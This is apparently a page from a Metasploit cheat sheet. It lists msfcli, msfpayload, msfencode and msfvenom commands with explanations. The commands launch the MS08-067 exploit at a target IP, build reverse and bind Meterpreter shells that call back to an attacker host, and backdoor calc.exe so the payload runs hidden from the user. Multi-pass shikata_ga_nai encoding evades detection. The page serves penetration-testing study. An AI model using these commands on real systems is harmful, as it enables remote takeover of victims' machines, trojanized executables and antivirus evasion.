
Cheat Sheet 281

MSFcli Commands

msfcli | grep exploit

Show only exploits.

msfcli | grep exploit/windows

Show only Windows exploits.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E

Launch the ms08_067_netapi exploit at 172.16.32.142 with a bind_tcp payload that listens on port 443.

MSF, Ninja, Fu

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe

Create a reverse Meterpreter payload connecting back to 192.168.1.5 on port 443, using calc.exe as a template to backdoor. The -k flag keeps execution flow within the application so that it continues to work, and the shikata_ga_nai encoded payload (seven iterations) is written to payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe

Create a reverse Meterpreter payload connecting back to 192.168.1.5 on port 443, using calc.exe as a template to backdoor. Without -k, execution flow is not kept within the application, and nothing is shown to the end user when it is executed. This is useful when you have remote access via a browser exploit and don't want the calculator application popping up for the end user. The shikata_ga_nai encoded payload is again written to payload.exe.

msfpayload windows/meterpreter/bind_tcp LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Create a bind_tcp Meterpreter payload in raw format, encode it seven times using shikata_ga_nai, output it in Windows portable executable format with the name payload.exe, and then start a multi/handler listening for it to execute.

MSFvenom

Leverage msfvenom, an all-in-one suite, to create and encode your payload in a single step (msfvenom later replaced msfpayload and msfencode, which have since been removed from the framework):

msfvenom --payload windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai LHOST=172.16.1.32 LPORT=443 > msf.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
root@bt://opt/framework3/msf3#

This one-liner creates the payload and writes it directly in executable format.